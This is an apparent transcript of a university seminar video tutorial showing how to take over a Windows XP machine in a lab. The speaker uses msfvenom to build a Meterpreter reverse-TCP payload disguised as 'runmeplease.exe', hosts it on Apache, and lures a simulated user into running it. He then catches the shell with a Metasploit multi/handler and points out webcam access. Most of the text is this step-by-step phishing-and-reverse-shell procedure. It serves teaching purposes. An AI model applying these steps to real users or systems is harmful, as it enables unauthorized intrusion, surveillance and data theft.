Hello, I'm Kyle Crick, and today we'll be going through a little tutorial on hacking into Windows XP via maliciously crafted exe. This was produced for the CS 490 Senior Seminar class at San Diego State University, taught by Steve Price. There's a difference between hacking and pen testing. Hacking is where we attack a remote system to take information or cause a denial of service, or cause damage to the server that we're hacking into. Pen testing is quite the opposite. It is where a company will hire a hacker to hack into their systems to find out what they're vulnerable to and how they can fix it. Today we're going to be taking advantage of phishing, one of the biggest sources of data breaches, where we trick a user into downloading a file or providing information that they're not supposed to, and then we take over control of their system. And if we're really lucky, they're tied to other machines or perhaps a file share. Not going to be the case today, though. So our goal is to get a shell open on a remote XP host. Today we're going to be using Kali Linux, which I am currently logged into. Kali Linux is a popular hacking and pen testing Linux distribution. We're also going to be using msfvenom. So we're going to start by finding our IP addresses on our hosts. To do that on Linux, you type in ifconfig, then you look for the inet address. Our IP address on this machine is 192.168.205.131. That may vary for you. Then we're going to go to the Windows box. We're going to type in ipconfig, one letter difference, 192.168.205.129. We're going to use ping to hit the other server to make sure that they are talking. They should be, since they are on the same network, but we're just going to double check. Okay, cool, we're getting replies, we're good to go. So let's start msfvenom. MSF is the Metasploitable framework. It is a collection of exploits and tools that is used for hacking and pen testing. We're going to create a custom payload today. So we're going to do that by typing -p. We're going to set our payload to Windows/meterpreter. We're going to double check our spelling, which was wrong. So we're going to fix that. Alright, meterpreter/reverse_TCP. So what this is going to do today is we're going to make a payload, we're going to put it on a web server, we're going to set up a service to listen to a port, which we're about to specify. We're going to get the user to double click on a file, download it, and then run it on their machine. And then we're going to leave them a nice little note saying, hey, you need to be more careful, we're friendly pen testers, and we just hacked you. So, msfvenom -p Windows meterpreter reverse TCP. Now we are going to set our left host or listening host via LHOST equals. We're going to set the IP address of this machine. So 192.168.205.131. We're going to set up our listening port. We're going to set something bogus so that nothing else is already listening for us. So we're going to type in 12345. To specify the file that msfvenom is going to output, the format of that file rather, we're going to use the -f flag. Then we're going to say .exe. We're going to rename this file that it's about to create to run me. How else are we going to get users to click on it? Let's make it run me please. I feel like that's more enticing. There we go. So that's going to create our custom payload. You can ignore all of this. No platform selected, no ARC, no encoder. You can ignore that. It's created, which we can verify by an ls. And there it is, run me please. Now we're going to put that on our Apache 2 web server by doing cp. We're going to do run, and then we're just going to tab to get the autocomplete. We're going to say /var/www/html. Then we're going to cd to that folder to make sure that our copy went just perfectly. ls, and we're ready to go. Now we're going to type in service Apache to start. So what that's going to do is it's either going to start or restart our Apache 2 web server to make sure that our runmeplease.exe file is ready to go. Now we're going to be taking advantage of the last tool in our toolkit, which is the gullible user. a gullible user that is susceptible to phishing. They're just going to go to this sketchy website. So we're going to use Internet Explorer, http:// typically we're going to use a domain, but I didn't set that up for the purposes of this demonstration, so we're just going to type in the actual IP address of my machine, .131, and we're going to type in the file that we want to download, which is runmeplease.exe. Hit enter. There we go. So let's pretend we're gullible user. Do I want to download this? Yeah, I think so. Too bad I don't have a file share to infect the whole company with. Guess I'll just have to put it on my own desktop. Okay, cool. Run me, please. Description. Apache Bench command line utility? Let's see what this does. There's an open file security warning pop-up. Run. Probably should have read all that info, but I didn't. That's weird. It didn't do anything. Okay, now we're going to switch back over to our hacker, and our hacker is going to set up his listening port. So we're going to do MSF console. We're going to set up our handler to listen on port 12345. We're going to do that by typing in use multi/handler. Perfect, didn't misspell anything. So set. Well, actually, first we're going to show what we're running by typing in show options. Okay, we've got nothing going on right now, so we're going to do set payload. We're going to set it to the payload that we specified earlier in msfvenom, which was Windows/meterpreter/reverse. Just double checking my spelling. Reverse TCP. Going to wait patiently. We're going to show our options again. Okay. We notice a problem almost immediately. Our LPORT is wrong. It's currently listening on 44444. We don't want that. So we're going to change that by setting, by typing in set LPORT 1, 2, 3, 4, 5. We're going to set our listening host to this current host by LHOST 192.168.205.131. So we're just giving it our IP address to send this this payload back to us. We're ready to go, so we're going to type in exploit. Alright, so our service is up. Now we're going to go back over to the user and we're going to do this again. Run me, please. Okay, sounds great. Huh, weird, didn't do anything. But it did. They've been hacked. Just like that. 2 clicks, hacked, done. Now we're in meterpreter. We have a shell open on their system. Here's to show you some of the options that you have. That's creepy. Webcam. That's just great. We're not going to be using that today, but we will be doing edit. And we're going to leave them a little note that they got hacked and that they should be more careful. So edit actually launches into Vim on my machine. So we're going to type I to insert. Hey, user, you have been hacked. Be more careful. Careful next time. Then you're going to hit escape and shift ZZ to save the file. We're going to type in ls to make sure it's saved. There it is. Switch back over to the XP box. And there's our friendly little message, hacked. Hey user, you've been hacked. Be more careful next time. Alright, I hope that was informative for you guys. I hope you learned a little bit about hacking into XP boxes, how vulnerable XP is, and how vulnerable users are. In the making of this video tutorial, I referenced Penetration Testing, a hands-on introduction to hacking by Georgia Weidman. That's where I learned to use msfvenom to create the maliciously crafted EXEs. I also used QuickTime for Mac to record this video. Thank you for watching. I hope you learned something.